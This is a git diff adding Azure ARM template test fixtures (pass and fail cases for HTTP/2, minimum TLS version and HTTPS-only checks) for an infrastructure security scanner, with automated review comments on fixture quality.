+ } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + 
"exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": true, + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": 
"string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + 
"virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ], + "outputs": { + "proxyKey": { + "type": "object", + "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]" + } + } +} + diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass2.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass2.json new file mode 100644 index 00000000000..0871576b6cc --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass2.json 
@@ -0,0 +1,373 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "vaultName": { + "type": "string", + "metadata": { + "description": "The name of the key vault to be created." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The name of the key to be created." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The location of the resources" + } + }, + "skuName": { + "type": "string", + "defaultValue": "standard", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The SKU of the vault to be created." + } + }, + "keyType": { + "type": "string", + "defaultValue": "RSA", + "allowedValues": [ + "EC", + "EC-HSM", + "RSA-HSM" + ], + "metadata": { + "description": "The JsonWebKeyType of the key to be created." + } + }, + "keyOps": { + "type": "array", + "defaultValue": [], + "metadata": { + "description": "The permitted JSON web key operations of the key to be created." + } + }, + "keySize": { + "type": "int", + "defaultValue": 2048, + "metadata": { + "description": "The size in bits of the key to be created." + } + }, + "curveName": { + "type": "string", + "defaultValue": "", + "allowedValues": [ + "", + "P-256", + "P-256K", + "P-384", + "P-521" + ], + "metadata": { + "description": "The JsonWebKeyCurveName of the key to be created." 
+ } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "pass2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": 
"string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": true, + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + 
"vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "string", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + 
"virtualPath": "string"
+ }
+ ],
+ "virtualPath": "string"
+ }
+ ],
+ "vnetName": "string",
+ "vnetPrivatePortsCount": "int",
+ "vnetRouteAllEnabled": "bool",
+ "websiteTimeZone": "string",
+ "webSocketsEnabled": "bool",
+ "windowsFxVersion": "string",
+ "xManagedServiceIdentityId": "int"
+ },
+ "storageAccountRequired": "bool",
+ "virtualNetworkSubnetId": "string",
+ "vnetContentShareEnabled": "bool",
+ "vnetImagePullEnabled": "bool",
+ "vnetRouteAllEnabled": "bool"
+ }
+ }
+ ],
+ "outputs": {
+ "proxyKey": {
+ "type": "object",
+ "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]"
+ }
+ }
+}
+
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail.json
new file mode 100644
index 00000000000..4a5965c74df
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail.json
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "fail",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+ "siteConfig": {
+ "minTlsVersion": "1.1"
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail2.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail2.json
new file mode 100644
index 00000000000..c74057282fe
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail2.json
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/slots",
+ "apiVersion": "2021-02-01",
+ "name": "fail2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+ "siteConfig": {
+ "minTlsVersion": "1.1"
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass.json
new file mode 100644
index 00000000000..0dbbafaebb0
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass.json
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+ "siteConfig": {
+ "minTlsVersion": "1.2"
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass2.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass2.json
new file mode 100644
index 00000000000..b81f1b491f8
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass2.json
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2021-02-01",
+ "name": "pass2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+ "siteConfig": {
+ "minTlsVersion": 1.2
+ }
+ }
+ }
+ ]
+}
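Review bot: pass2.json sets `"minTlsVersion": 1.2` as a JSON number (pass4.json in the next hunk does the same), whereas the ARM schema types `siteConfig.minTlsVersion` as a string enum (`"1.0"`, `"1.1"`, `"1.2"`), so these two fixtures pin tolerant coercion in the check rather than a template Azure would accept as written; that is worth keeping, but the names `pass2`/`pass4` do not say so, and something like `pass_numeric.json` would. No fixture covers a `Microsoft.Web/sites` whose `siteConfig` lacks `minTlsVersion` (or has no `siteConfig` at all), which is exactly where the check's absent-property behaviour gets pinned, and no fail fixture uses `"1.0"`. `"kind": "functionapp,linux"` appears only on pass4.json, so if the check filters on kind — which I cannot see from here — the remaining fixtures are exercising the plain web-app path, not the function-app one the check is named after.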
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass3.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass3.json
new file mode 100644
index 00000000000..a21270870cc
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass3.json
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/slots",
+ "apiVersion": "2021-02-01",
+ "name": "pass3",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+ "siteConfig": {
+ "minTlsVersion": "1.2"
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass4.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass4.json
new file mode 100644
index 00000000000..93359bab29f
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass4.json
@@ -0,0 +1,19 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites/slots",
+ "apiVersion": "2021-02-01",
+ "name": "pass4",
+ "location": "[resourceGroup().location]",
+ "kind": "functionapp,linux",
+ "properties": {
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+ "siteConfig": {
+ "minTlsVersion": 1.2
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_fail.json b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_fail.json
new file mode 100644
index 00000000000..f26d4acabd8
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_fail.json
@@ -0,0 +1,57 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.15.31.15270", + "templateHash": "11556880252039009077" + } + }, + "parameters": { + "hostingPlanName": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "Name of the hosting plan to use in Azure." + } + }, + "webSiteName": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "Name of the Azure Web app to create." + } + } + }, + "resources": [ + + + { + "type": "Microsoft.Web/sites/config", + "apiVersion": "2022-03-01", + "name": "sites_config_fail", + "properties": { + "globalValidation": { + "requireAuthentication": true, + "unauthenticatedClientAction": "Return401" + }, + "httpSettings": { + "forwardProxy": { + "convention": "NoProxy" + }, + "requireHttps": false, + "routes": { + "apiPrefix": "/.auth" + } + }, + "javaVersion": "1.8", + "javaContainer": "TOMCAT", + "javaContainerVersion": "9.0" + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/sites', parameters('webSiteName'))]" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_pass.json b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_pass.json new file mode 100644 index 00000000000..bc7df1df928 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_pass.json 
@@ -0,0 +1,57 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.15.31.15270", + "templateHash": "11556880252039009077" + } + }, + "parameters": { + "hostingPlanName": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "Name of the hosting plan to use in Azure." + } + }, + "webSiteName": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "Name of the Azure Web app to create." + } + } + }, + "resources": [ + + + { + "type": "Microsoft.Web/sites/config", + "apiVersion": "2022-03-01", + "name": "sites_config_pass", + "properties": { + "globalValidation": { + "requireAuthentication": true, + "unauthenticatedClientAction": "Return401" + }, + "httpSettings": { + "forwardProxy": { + "convention": "NoProxy" + }, + "requireHttps": true, + "routes": { + "apiPrefix": "/.auth" + } + }, + "javaVersion": "1.8", + "javaContainer": "TOMCAT", + "javaContainerVersion": "9.0" + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/sites', parameters('webSiteName'))]" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_pass1.json b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_pass1.json new file mode 100644 index 00000000000..29b95b85347 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_pass1.json 
@@ -0,0 +1,56 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.15.31.15270", + "templateHash": "11556880252039009077" + } + }, + "parameters": { + "hostingPlanName": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "Name of the hosting plan to use in Azure." + } + }, + "webSiteName": { + "type": "string", + "minLength": 1, + "metadata": { + "description": "Name of the Azure Web app to create." + } + } + }, + "resources": [ + + + { + "type": "Microsoft.Web/sites/config", + "apiVersion": "2022-03-01", + "name": "sites_config_pass1", + "properties": { + "globalValidation": { + "requireAuthentication": true, + "unauthenticatedClientAction": "Return401" + }, + "httpSettings": { + "forwardProxy": { + "convention": "NoProxy" + }, + "routes": { + "apiPrefix": "/.auth" + } + }, + "javaVersion": "1.8", + "javaContainer": "TOMCAT", + "javaContainerVersion": "9.0" + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/sites', parameters('webSiteName'))]" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_fail.json b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_fail.json new file mode 100644 index 00000000000..1be97affa6b --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_fail.json 
@@ -0,0 +1,76 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "10602523904429381366" + } + }, + "parameters": { + + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "DOTNETCORE|3.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + } + }, + "variables": { + "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-03-01", + "name": "sites_fail", + "location": "[parameters('location')]", + "kind": "app", + "properties": { + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('serverFarmName'))]", + "httpsOnly": false, + "siteConfig": { + "detailedErrorLoggingEnabled": true, + "httpLoggingEnabled": true, + "requestTracingEnabled": true, + "ftpsState": "Disabled", + "minTlsVersion": "1.2" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', parameters('serverFarmName'))]", + "[resourceId('Microsoft.Web/sites', parameters('webAppNameBackend'))]" + ] + }, + { + "type": "Microsoft.Web/sites", + "apiVersion": "2021-02-01", + "name": "sites_fail", + "location": "[parameters('location')]", + "properties": { + "httpsOnly": false, + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanPortalName'))]", + "siteConfig": { + "linuxFxVersion": "[parameters('linuxFxVersion')]", + "minTlsVersion": "1.2", + "ftpsState": "FtpsOnly" + } + }, + "identity": { + "type": "SystemAssigned" + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanPortalName'))]" + ] + } + ] +} 
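Review bot: sites_fail.json references parameters the template never declares — `parameters('webAppName')` inside `variables.appServicePlanPortalName`, and `parameters('serverFarmName')` / `parameters('webAppNameBackend')` in the slot resource's `serverFarmId` and `dependsOn` — so the fixture is not a deployable template, and if the ARM runner tries to resolve those expressions they will stay unresolved. sites_fail1.json and sites_pass.json (the next two hunks) carry the same undeclared references. Either declare them under `parameters` next to `location` and `linuxFxVersion`, or drop the `variables` and `dependsOn` plumbing so the fixture only models what the check reads, the `httpsOnly` property on `Microsoft.Web/sites` and `Microsoft.Web/sites/slots`.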
diff --git a/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_fail1.json b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_fail1.json new file mode 100644 index 00000000000..b34b48eaa00 --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_fail1.json 
@@ -0,0 +1,74 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "10602523904429381366" + } + }, + "parameters": { + + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "DOTNETCORE|3.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + } + }, + "variables": { + "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-03-01", + "name": "sites_fail1", + "location": "[parameters('location')]", + "kind": "app", + "properties": { + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('serverFarmName'))]", + "siteConfig": { + "detailedErrorLoggingEnabled": true, + "httpLoggingEnabled": true, + "requestTracingEnabled": true, + "ftpsState": "Disabled", + "minTlsVersion": "1.2" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', parameters('serverFarmName'))]", + "[resourceId('Microsoft.Web/sites', parameters('webAppNameBackend'))]" + ] + }, + { + "type": "Microsoft.Web/sites", + "apiVersion": "2021-02-01", + "name": "sites_fail1", + "location": "[parameters('location')]", + "properties": { + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanPortalName'))]", + "siteConfig": { + "linuxFxVersion": "[parameters('linuxFxVersion')]", + "minTlsVersion": "1.2", + "ftpsState": "FtpsOnly" + } + }, + "identity": { + "type": "SystemAssigned" + }, + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanPortalName'))]" + ] + } + ] +} 
diff --git a/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_pass.json b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_pass.json new file mode 100644 index 00000000000..061d1462fef --- /dev/null +++ b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_pass.json 
@@ -0,0 +1,90 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "10602523904429381366" + } + }, + "parameters": { + + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "sku": { + "type": "string", + "defaultValue": "F1", + "metadata": { + "description": "The SKU of App Service Plan." + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "DOTNETCORE|3.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "repoUrl": { + "type": "string", + "defaultValue": " ", + "metadata": { + "description": "Optional Git Repo URL" + } + } + }, + "variables": { + "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/sites/slots", + "apiVersion": "2022-03-01", + "name": "sites_pass", + "location": "[parameters('location')]", + "kind": "app", + "properties": { + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('serverFarmName'))]", + "httpsOnly": true, + "siteConfig": { + 